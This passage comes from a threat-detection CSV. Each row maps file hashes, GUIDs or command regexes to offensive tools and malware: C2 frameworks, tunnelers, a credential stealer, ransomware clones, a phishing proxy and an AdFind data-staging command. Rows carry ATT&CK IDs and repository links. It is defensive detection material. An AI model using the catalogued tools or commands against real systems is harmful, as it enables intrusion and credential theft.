T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*6e909861781a8812ee01bc59435fd73fd34da23fa9ad6d699eefbf9f84629876*",".{0,1000}6e909861781a8812ee01bc59435fd73fd34da23fa9ad6d699eefbf9f84629876.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6eabbccdf8fe27c93e5a87899fd2ef81bf1670ab65103b999559266d936acea3*",".{0,1000}6eabbccdf8fe27c93e5a87899fd2ef81bf1670ab65103b999559266d936acea3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6EB55FE6-C11C-453B-8B32-22B689B6B3E2*",".{0,1000}6EB55FE6\-C11C\-453B\-8B32\-22B689B6B3E2.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*6ec665b1a7a7d7a63f8c92469d8bdd3365a8b98fe5f8093112cdfe2887a3a9c2*",".{0,1000}6ec665b1a7a7d7a63f8c92469d8bdd3365a8b98fe5f8093112cdfe2887a3a9c2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6ee5c663c74ab36046c1648d2ccc825c67e5d0104da08152d3d49f3482499567*",".{0,1000}6ee5c663c74ab36046c1648d2ccc825c67e5d0104da08152d3d49f3482499567.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6ef5c10715019e5032c7cbb7c51d6e6bec069098ce76a1f83e7c45f250663f06*",".{0,1000}6ef5c10715019e5032c7cbb7c51d6e6bec069098ce76a1f83e7c45f250663f06.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6f0f34a9afada52530634afb65d734b7121ad6c6d5690f708c7b4ff14572ada5*",".{0,1000}6f0f34a9afada52530634afb65d734b7121ad6c6d5690f708c7b4ff14572ada5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6f1cd2444be1742a43e643df851e0d3dae010c782bd3e05f95b8cadd2c15ec18*",".{0,1000}6f1cd2444be1742a43e643df851e0d3dae010c782bd3e05f95b8cadd2c15ec18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6f2a53476cbc09bbffe7e07d6e9dd19d*",".{0,1000}6f2a53476cbc09bbffe7e07d6e9dd19d.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*6f305cfc78d9cc8ee0bdfe2b55d4469824a61d1ca519e1456bd0257f7decb48e*",".{0,1000}6f305cfc78d9cc8ee0bdfe2b55d4469824a61d1ca519e1456bd0257f7decb48e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6f46d85ab9aef2bf824b8714f29f9ff189a390c56294ab82308178e86fad472d*",".{0,1000}6f46d85ab9aef2bf824b8714f29f9ff189a390c56294ab82308178e86fad472d.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","file_hash","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*6f4889c2f3d0a774b4bb263ce776d06ead586b813d144ea38b0b9fdabac445d7*",".{0,1000}6f4889c2f3d0a774b4bb263ce776d06ead586b813d144ea38b0b9fdabac445d7.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*6f49763e098fa4e3fd13ba7fef3254f452ac46381f56f4177471932b9f00eb45*",".{0,1000}6f49763e098fa4e3fd13ba7fef3254f452ac46381f56f4177471932b9f00eb45.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04*",".{0,1000}6f7949ffcf1b9bce2ab2301e6a75a4ba8690ea3434b74bd6c3ba0e9aca6d5d04.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*6f813ccfd911c1512b7bac17e0c0634e9953b9626fcb0f7db3ce4208578d6190*",".{0,1000}6f813ccfd911c1512b7bac17e0c0634e9953b9626fcb0f7db3ce4208578d6190.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6f823ad8cdfce84637bfbbcfc16fcf59f479fb56b735a8fa862096205f559029*",".{0,1000}6f823ad8cdfce84637bfbbcfc16fcf59f479fb56b735a8fa862096205f559029.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*6f8aeb6d268e81855ae004d52d76c046bc092cb9291f6277d3c317c1df712fea*",".{0,1000}6f8aeb6d268e81855ae004d52d76c046bc092cb9291f6277d3c317c1df712fea.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6F99CB40-8FEF-4B63-A35D-9CEEC71F7B5F*",".{0,1000}6F99CB40\-8FEF\-4B63\-A35D\-9CEEC71F7B5F.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*6facdc6a09f2d89e156a7b11dc628815f4a00ba25ce37f9443f4fb7f50877f85*",".{0,1000}6facdc6a09f2d89e156a7b11dc628815f4a00ba25ce37f9443f4fb7f50877f85.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*6fc0604bf7430b36c6c3e98132f6b708e384581e005fd920da483b5bd2da3cb4*",".{0,1000}6fc0604bf7430b36c6c3e98132f6b708e384581e005fd920da483b5bd2da3cb4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*6fc368328ce3a6d164f9a867b1b163bd2aac732b49ecda43a926ff39dc81e736*",".{0,1000}6fc368328ce3a6d164f9a867b1b163bd2aac732b49ecda43a926ff39dc81e736.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6fd0b65efe28fce4c186c04c467198ed5072bdcfeb90e939b06563253c4eab44*",".{0,1000}6fd0b65efe28fce4c186c04c467198ed5072bdcfeb90e939b06563253c4eab44.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*6FF9974C-B3C6-4EEA-8472-22BE6BD6F5CD*",".{0,1000}6FF9974C\-B3C6\-4EEA\-8472\-22BE6BD6F5CD.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*6ffd1850657b2dd46a03b1f2988a7c8d153943b6b7dc711c12a3c96fe77288b0*",".{0,1000}6ffd1850657b2dd46a03b1f2988a7c8d153943b6b7dc711c12a3c96fe77288b0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7.exe a -mx3 ad.7z ad_*.txt*",".{0,1000}7\.exe\sa\s\-mx3\sad\.7z\sad_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","7zip","7zip command to zip results from adfind scans. attackers perform Active Directory collection using AdFind in batch scriptsfrom C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1074.001 - T1083 - T1560.001 - T1105","TA0003 - TA0007 - TA0009","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*7015bb3d9a25c8809d80adc80aa0bd7e89c04502ca2b4836fcc62312d167a977*",".{0,1000}7015bb3d9a25c8809d80adc80aa0bd7e89c04502ca2b4836fcc62312d167a977.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*70376ae9437efcd92034825528cc12f1c0e03c1a4f965aabb3377d2a19e1d4f7*",".{0,1000}70376ae9437efcd92034825528cc12f1c0e03c1a4f965aabb3377d2a19e1d4f7.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*704a31cd89911a0f7d1741ee9ca32ca0f5496b06370bf398dfc5b7d3a31ef563*",".{0,1000}704a31cd89911a0f7d1741ee9ca32ca0f5496b06370bf398dfc5b7d3a31ef563.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*704b2be6d3339668a2c4287473fe08261ef23808efcce1a09a0173e514655a18*",".{0,1000}704b2be6d3339668a2c4287473fe08261ef23808efcce1a09a0173e514655a18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*70527328-DCEC-4BA7-9958-B5BC3E48CE99*",".{0,1000}70527328\-DCEC\-4BA7\-9958\-B5BC3E48CE99.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*7076e114583006ebcf8f50ab7540ce8552af788431ef2a89227e74876dd13e17*",".{0,1000}7076e114583006ebcf8f50ab7540ce8552af788431ef2a89227e74876dd13e17.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*70795D10-8ADF-4A4D-A584-9AB1BBF40D4B*",".{0,1000}70795D10\-8ADF\-4A4D\-A584\-9AB1BBF40D4B.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*70b5a24ffc45a0c4eadd31d0e202ec9059efc0f0881a50c28ca8ebc2504685e7*",".{0,1000}70b5a24ffc45a0c4eadd31d0e202ec9059efc0f0881a50c28ca8ebc2504685e7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*70BCFFDB-AE25-4BEA-BF0E-09DF06B7DBC4*",".{0,1000}70BCFFDB\-AE25\-4BEA\-BF0E\-09DF06B7DBC4.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*70c7134c48911888f49f438586cde06c5da2d333921164a540935c25b612fcc6*",".{0,1000}70c7134c48911888f49f438586cde06c5da2d333921164a540935c25b612fcc6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*70cbfdb9e353bae5fd131519b3258be7c9f46e60d97737dfcd386e2c0b61ebf5*",".{0,1000}70cbfdb9e353bae5fd131519b3258be7c9f46e60d97737dfcd386e2c0b61ebf5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*70cee544c4fdb709afd0e36f93a68f289f844d0373a53ae1e7eb257f7410af36*",".{0,1000}70cee544c4fdb709afd0e36f93a68f289f844d0373a53ae1e7eb257f7410af36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*70ddb33c1ce8b8ac5d3a7339ed37fedf436f91e5a31bdd19c8029968766ad3e6*",".{0,1000}70ddb33c1ce8b8ac5d3a7339ed37fedf436f91e5a31bdd19c8029968766ad3e6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*70ef0d3588b87bd71c2774c1bb177f59ae31a99b1a4ef82f7d2a16175c3caaf6*",".{0,1000}70ef0d3588b87bd71c2774c1bb177f59ae31a99b1a4ef82f7d2a16175c3caaf6.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*70f7957d5aafdfe4655ae31e786310395b301e570e75e91c136d0b142f5024b6*",".{0,1000}70f7957d5aafdfe4655ae31e786310395b301e570e75e91c136d0b142f5024b6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*7103d888907045c6387e39b275db1a7e6fdb22d3d6e15ac6a44ddb1df80c76a4*",".{0,1000}7103d888907045c6387e39b275db1a7e6fdb22d3d6e15ac6a44ddb1df80c76a4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7111362ec699a575cc5bec3f2e6c4b29b97c42704456ddd00c519e7613b9b67b*",".{0,1000}7111362ec699a575cc5bec3f2e6c4b29b97c42704456ddd00c519e7613b9b67b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*71146194df27fa843b2d1e8e5bbc924b19bf61f6d89d3ac76aaf8270c443fe78*",".{0,1000}71146194df27fa843b2d1e8e5bbc924b19bf61f6d89d3ac76aaf8270c443fe78.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*7116769dee3a57fd5aa99823a89114b267b47902f5b71c29e6022926544c36a3*",".{0,1000}7116769dee3a57fd5aa99823a89114b267b47902f5b71c29e6022926544c36a3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 